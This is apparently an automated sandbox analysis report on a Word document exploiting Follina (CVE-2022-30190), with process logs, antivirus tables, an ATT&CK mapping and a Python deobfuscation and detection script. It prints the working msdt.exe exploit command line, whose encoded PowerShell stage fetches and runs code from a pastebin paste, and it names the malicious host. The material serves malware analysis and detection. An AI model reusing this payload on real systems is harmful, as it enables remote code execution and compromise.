          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uhgycnj1\uhgycnj1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.dll
Source: C:\Windows\SysWOW64\msdt.exe | Window / User API: threadDelayed 1704
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67B5.tmp" "c:\Users\user\AppData\Local\Temp\uhgycnj1\CSC5D456D749058409DBC18DA207571A96.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7E0C.tmp" "c:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2066.tmp" "c:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP"
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
Source: C:\Windows\SysWOW64\msdt.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
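The msdt.exe command line recorded above is the Follina trigger itself: the `IT_BrowseForFile` parameter carries a PowerShell subexpression `$( ... )` that rebuilds `::` and `"` from `[char]` values, base64-decodes a second stage, and resolves a `-f` format string to produce the final command. The following Python script is an added example, not part of this Joe Sandbox report or of the sample. It walks that chain offline on a copy of the recorded command line: it flags the `ms-msdt:` plus `$(` shape, folds the `[char]` concatenation, decodes the base64 blob, applies the `-f` operator and pulls out the network indicator. The benign control command line, the helper names and the 24-character base64 threshold are the example's own assumptions.

```python
import base64
import re

# The msdt.exe command line recorded in this report, copied here as a string
# literal (constructed input for the example) so the script runs offline.
MSDT_CMDLINE = r'''C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO'''

# Constructed benign control: a troubleshooter launch whose parameters carry
# no PowerShell subexpression (the program path is invented for the example).
BENIGN_CMDLINE = r'''C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /param "IT_BrowseForFile=C:\Program Files\Example\example.exe IT_LaunchMethod=ContextMenu'''


def is_follina_cmdline(cmdline: str) -> bool:
    """Follina shape: an ms-msdt: URI whose /param block carries a PowerShell
    subexpression $( ... ), which the troubleshooter script evaluates."""
    if "ms-msdt:" not in cmdline.lower():
        return False
    m = re.search(r'/param\s+"?(.*)$', cmdline, re.I | re.S)
    params = m.group(1) if m else cmdline
    return "$(" in params


def fold_char_concat(ps: str) -> str:
    """Rejoin string literals split by '+[char]NN+' ([char]58 is a colon,
    [char]34 is a double quote)."""
    return re.sub(
        r"'((?:\+\[char\]\d+)+)\+'",
        lambda m: "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1))),
        ps,
    )


def decode_base64_blobs(text: str, min_len: int = 24) -> list:
    """Decode every base64 run that yields printable text; other runs are skipped
    (the min_len threshold is the example's own choice)."""
    out = []
    for blob in re.findall(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, text):
        if len(blob) % 4:
            continue
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            out.append(decoded)
    return out


def unwrap_iex(ps: str) -> str:
    """Strip one textual iex( ... ) wrapper: iex runs the string it is handed."""
    m = re.fullmatch(r"\s*iex\((.*)\)\s*", ps, re.S)
    return m.group(1) if m else ps


_FORMAT_RE = re.compile(r"'((?:[^']|'')*)'\s*-f\s*((?:'[^']*'\s*,?\s*)+)")


def resolve_format_operator(ps: str) -> str:
    """Apply PowerShell's -f for the plain '...{0}...' -f 'a','b' case; the {n}
    placeholders are the same as Python's str.format, so hand the pieces to it."""
    def _apply(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        try:
            return m.group(1).format(*args)
        except (IndexError, KeyError, ValueError):
            return m.group(0)
    return _FORMAT_RE.sub(_apply, ps)


def extract_network_iocs(ps: str) -> list:
    """Host/path strings in the resolved command, for proxy and DNS log pivots."""
    return re.findall(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+(?:/[\w./-]*)?", ps, re.I)


def analyse(cmdline: str) -> dict:
    """Detect, fold the [char] concatenation, decode, resolve -f, extract IOCs."""
    result = {"follina": is_follina_cmdline(cmdline), "stages": [], "iocs": []}
    if not result["follina"]:
        return result
    for stage in decode_base64_blobs(fold_char_concat(cmdline)):
        final = resolve_format_operator(unwrap_iex(stage))
        result["stages"].append((stage, final))
        result["iocs"].extend(extract_network_iocs(final))
    return result


if __name__ == "__main__":
    r = analyse(MSDT_CMDLINE)
    print("follina :", r["follina"])
    for stage, final in r["stages"]:
        print("decoded :", stage)
        print("resolved:", final)
    print("iocs    :", r["iocs"])
```

Run as written, the script resolves the embedded second stage to `iex(irm pastebin.com/raw/fGgBy6HG)`, a download-and-execute of a pastebin raw paste; that host/path is the indicator to pivot on in proxy and DNS telemetry, and the `ms-msdt:` plus `$(` test in `is_follina_cmdline` is the shape to alert on in process-creation events where msdt.exe has an Office parent.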
MITRE ATT&CK matrix, listed per tactic (the number in parentheses is the count of matched report signatures mapped to that technique; techniques without a number are the matrix's unmatched cells)
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Command and Scripting Interpreter (1); Exploitation for Client Execution (23); At (Linux); At (Windows); Cron
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script
Defense Evasion: Masquerading (11); Process Injection (11); DLL Side-Loading (1); Binary Padding; Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Query Registry (1); Application Window Discovery (1); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (13)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings
Impact: Modify System Partition; Device Lockout; Delete Device Data
Behavior graph (ID 686090, sample qoIZSkdejM.docx, start date 18/08/2022, architecture WINDOWS, score 100), rendered here as a process tree; the numbers after a process name are the graph's created-file and created-registry-value counts:
Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Antivirus detection for dropped file; 6 other signatures
WINWORD.EXE (75, 59)
  network: www.malwarejake.com, 143.198.109.79:443 (LDCOMNETFR, United States), local ports 49741 and 49742
  dropped: C:\Users\user\AppData\Local\...\456[1].htm (HTML); C:\Users\user\AppData\Local\...F858049.htm (HTML); C:\Users\user\AppData\Local\...\CCAB4A43.htm (HTML)
  started msdt.exe (21)
    dropped: C:\Windows\Temp\...\DiagPackage.dll.mui (PE32); C:\Windows\Temp\...\DiagPackage.dll (PE32+)
  started MSOSYNC.EXE (5, 12)
csc.exe (3)
  dropped: C:\Users\user\AppData\Local\...\md5akkd2.dll (PE32)
  started cvtres.exe (1)
csc.exe (3)
  dropped: C:\Users\user\AppData\Local\...\uhgycnj1.dll (PE32)
  started cvtres.exe (1)
csc.exe (3)
  dropped: C:\Users\user\AppData\Local\...\cywbhpso.dll (PE32)
  started cvtres.exe (1)

Antivirus detection for the submitted sample
Source | Detection | Scanner | Label
qoIZSkdejM.docx | 35% | Virustotal |
qoIZSkdejM.docx | 23% | Metadefender |
qoIZSkdejM.docx | 45% | ReversingLabs | Document-Word.Exploit.CVE-2022-30190
qoIZSkdejM.docx | 100% | Avira | W97M/Dldr.Agent.G1

Antivirus detection for dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm | 100% | Avira | JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm | 100% | Avira | JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm | 100% | Avira | JS/CVE-2022-30190.G
C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\DiagPackage.dll | 0% | Metadefender |
C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\DiagPackage.dll | 0% | ReversingLabs |
C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\en-US\DiagPackage.dll.mui | 0% | Metadefender |
C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\en-US\DiagPackage.dll.mui | 0% | ReversingLabs |
          No Antivirus matches
Antivirus detection for domains
Source | Detection | Scanner | Label
www.malwarejake.com | 0% | Virustotal |
Antivirus detection for URLs
Source | Detection | Scanner | Label
https://roaming.edog. | 0% | URL Reputation | safe
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe
https://my.microsoftpersonalcontent.com | 0% | URL Reputation | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://api.aadrm.com | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
https://www.malwarejake.com/456.html | 0% | Virustotal |
https://www.malwarejake.com/456.html | 100% | Avira URL Cloud | malware
https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
https://ncus.pagecontentsync. | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.malwarejake.com | 143.198.109.79 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.malwarejake.com/456.html | true | 0%, Virustotal; Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://login.microsoftonline.com/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://shell.suite.office.com:1443 | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://autodiscover-s.outlook.com/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://roaming.edog. | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://cdn.entity. | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://powerlift.acompli.net | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://cortana.ai | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://cloudfiles.onenote.com/upload.aspx | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://entitlement.diagnosticssdf.office.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://api.aadrm.com/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://api.microsoftstream.com/api/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://cr.office.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | Avira URL Cloud: safe | low
https://portal.office.com/account/?ref=ClientMeControl | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
